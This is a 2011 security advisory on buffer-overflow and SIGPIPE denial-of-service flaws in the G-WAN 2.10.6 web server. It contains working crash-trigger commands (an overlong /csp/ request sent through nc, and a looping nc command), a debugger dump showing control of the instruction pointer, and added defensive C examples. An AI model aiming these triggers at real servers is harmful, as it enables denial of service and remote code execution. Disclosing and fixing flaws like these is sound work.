G-WAN 2.10.6 Buffer Overflow
Posted Oct 17, 2011
Authored by Fredrik Widlund

G-WAN suffers from multiple vulnerabilities. A buffer overflow exists in the routine handling URL encoding for the "csp" (so-called G-WAN servlets) sub-directory; exploiting it allows remote execution of shellcode on the system. SIGPIPE signals were not handled correctly; exploiting this results in denial of service.

tags | advisory, denial of service, overflow, vulnerability, shellcode
SHA-256 | 4f748ec836979bd3edb6ddc3a547daf14847a2b5c909af7c91b8e935ac52e5bb

========================================================================
Title: Multiple G-WAN vulnerabilities

Product: G-WAN (http://gwan.com/)

Author: Fredrik Widlund
E-mail: fredrik.widlund (at) gmail (dot) com

Date: 2011-10-12
========================================================================

1. BACKGROUND

"G-WAN is much smaller, faster and safer than the next best:
- Web servers,
- Web applications servers,
- Web acceleration servers,
- KV stores & noSQL databases." (from gwan.com)

2. DESCRIPTION

Problems exist with design issues, parsing, signal handling, and
buffer management.

A) A buffer overflow exists in the routine handling URL encoding for
the "csp" (so-called G-WAN servlets) sub-directory. Exploiting the
vulnerability allows shellcode to be executed remotely on the system.

B) SIGPIPE signals were not handled correctly. Exploiting the
vulnerability resulted in denial of service.

C) Several minor issues.

3. DETAILS

The vulnerabilities were discovered and successfully exploited on an
Arch Linux 64-bit system running a Linux 3.0.6 kernel with ASLR
enabled.

A)
> perl -e "print 'GET /csp/','A'x1200,\" HTTP/1.0\r\n\r\n\"" | nc localhost 80
[...]
G-WAN 2.10.6 (pid:9167)
[New LWP 9169]
Program received signal SIGSEGV, Segmentation fault.
[Switching to LWP 9169]
0x41414141 in ?? ()
(gdb) i r
eax            0x31     49
ecx            0x81f2298        136258200
edx            0x0      0
ebx            0x41414141       1094795585
esp            0xf7da51f0       0xf7da51f0
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10202  [ IF RF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

A proof-of-concept exploit was written that brute-forces the ASLR stack
offset; it compromises a vulnerable system remotely in less than 5
minutes while sending at most one request per second, so that the G-WAN
watchdog does not give up.
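The defect class in A) is a copy during request-path decoding that is bounded by the client-supplied length rather than by the destination buffer. As an added example (not G-WAN's code; the function names are hypothetical), a percent-decoder in which the destination size bounds every write, plus a check that replays the 1200-byte /csp/ trigger shape from the advisory against a small buffer:

```c
#include <stddef.h>
#include <string.h>

/* Added example, not G-WAN's code: percent-decode a request path into a
 * fixed-size buffer. The destination size, never the client-supplied
 * length, bounds every write, so an overlong path is rejected instead of
 * running past the buffer. Returns the decoded length, or -1 if the path
 * would not fit or contains a malformed escape. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

int url_decode_bounded(const char *src, size_t srclen, char *dst, size_t dstsize)
{
    size_t in = 0, out = 0;

    if (dstsize == 0) return -1;
    while (in < srclen) {
        int c = (unsigned char)src[in];
        if (c == '%') {
            if (in + 2 >= srclen) return -1;            /* truncated %XX */
            int hi = hexval((unsigned char)src[in + 1]);
            int lo = hexval((unsigned char)src[in + 2]);
            if (hi < 0 || lo < 0) return -1;            /* malformed %XX */
            c = hi * 16 + lo;
            if (c == 0) return -1;                      /* %00 would truncate the C string */
            in += 3;
        } else {
            in++;
        }
        if (out + 1 >= dstsize) return -1;              /* no room for this byte plus the NUL */
        dst[out++] = (char)c;
    }
    dst[out] = '\0';
    return (int)out;
}

/* Replays the advisory's trigger shape offline: a 1205-byte "/csp/AAAA..."
 * path against a 256-byte buffer. Returns 1 when the decoder refused it. */
int overlong_csp_path_rejected(void)
{
    char path[1205], out[256];
    memcpy(path, "/csp/", 5);
    memset(path + 5, 'A', 1200);
    return url_decode_bounded(path, sizeof path, out, sizeof out) == -1;
}
```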

B)
The routines for parsing HTTP/0.9 were broken, resulting in an
infinitely looping reply. Repeatedly interrupting such loops quickly
results in denial of service.

> while :; do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n" | timeout 0.01 nc localhost 80 ; done
[...]
G-WAN 2.10.6 (pid:3948)
[New LWP 3951]
Program received signal SIGPIPE, Broken pipe.
[Switching to LWP 3951]
0xf7ffd430 in __kernel_vsyscall ()
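The process in B) dies because SIGPIPE keeps its default action: a write to a connection the client has already closed (what the `timeout 0.01 nc` loop provokes) terminates the server. As an added example (not G-WAN's code; function names are hypothetical; Linux is assumed for MSG_NOSIGNAL), the two defensive settings a server should apply, exercised offline with a socketpair whose client end is closed before the reply is written:

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL 0      /* non-Linux: rely on ignore_sigpipe() alone */
#endif

/* Added example, not G-WAN's code. Two layers of defence against a client
 * that hangs up mid-reply: ignore SIGPIPE process-wide, and pass
 * MSG_NOSIGNAL on every send so the condition surfaces as EPIPE. */
int ignore_sigpipe(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = SIG_IGN;
    sigemptyset(&sa.sa_mask);
    return sigaction(SIGPIPE, &sa, NULL);
}

/* Write the whole buffer. Returns 0, or -1 with errno set; EPIPE/ECONNRESET
 * mean "drop this connection", never "crash the server". */
int send_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = send(fd, buf, len, MSG_NOSIGNAL);
        if (n < 0) {
            if (errno == EINTR) continue;
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Offline stand-in for the advisory's scenario: a socketpair replaces the TCP
 * connection; the "client" end is closed before the reply is written.
 * Returns the errno the server side saw, or 0 if the send succeeded. */
int simulate_client_gone(void)
{
    int sv[2], err = 0;
    const char reply[] = "HTTP/1.0 200 OK\r\n\r\nhello\n";
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return errno;
    close(sv[1]);                          /* client hangs up */
    if (send_all(sv[0], reply, sizeof reply - 1) < 0) err = errno;
    close(sv[0]);
    return err;
}
```

With both measures in place the write fails with EPIPE and the connection is dropped; without them the same write delivers SIGPIPE and the whole server exits, which is the denial of service the advisory describes.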

4. AFFECTED VERSIONS

G-WAN 2.10.6 (October 6, 2011).

There is no archive of older versions available and the vendor refuses
to cooperate or acknowledge the issues.

5. SOLUTIONS

The issues seem to be resolved. Upgrade to the latest version.

6. REFERENCES

* http://gwan.com
* http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance/
* http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance-part-2/

========================================================================
Fredrik Widlund
fredrik.widlund (at) gmail (dot) com